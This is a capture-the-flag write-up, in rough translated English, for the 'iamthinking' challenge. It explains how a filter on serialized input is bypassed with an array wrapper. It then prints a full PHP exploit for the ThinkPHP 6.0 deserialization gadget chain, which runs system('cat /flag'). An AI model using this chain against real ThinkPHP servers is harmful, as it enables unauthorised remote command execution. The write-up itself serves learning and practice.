[an Xun cup 2019]iamthinking

Knowledge point ：

thinkphp6.0 Deserialization vulnerability

Problem solving ：

As soon as I came in, I found forbiden, Direct directory scan wave ~

Find out www.zip, Download it to start the code audit ：

It's a simple one index.php controller , The code will probably mean GET Incoming payload Parameters are serialized , however payload Can't use O start , Properly consider the deserialization vulnerability ,O yes php The first character after object serialization , Since you can't O start , Then put the object into an array , This is to a Begin to bypass . The next step is to find pop Chain , Have a look first thinkphp6.0 Is there a known deserialization vulnerability .

  Find out 6.0 There happens to be a deserialization vulnerability , Search anywhere on the Internet exp:

<?php

namespace think\model\concern;

trait Attribute
{
    private $data = ["key" => ["key1" => "cat /flag"]];
    private $withAttr = ["key"=>["key1"=>"system"]];
    protected $json = ["key"];
}
namespace think;

abstract class Model
{
    use model\concern\Attribute;
    private $lazySave;
    protected $withEvent;
    private $exists;
    private $force;
    protected $table;
    protected $jsonAssoc;
    function __construct($obj = '')
    {
        $this->lazySave = true;
        $this->withEvent = false;
        $this->exists = true;
        $this->force = true;
        $this->table = $obj;
        $this->jsonAssoc = true;
    }
}

namespace think\model;

use think\Model;

class Pivot extends Model
{
}
$a = new Pivot();
$b = new Pivot($a);
$c = array($b);
echo urlencode(serialize($c));

obtain flag: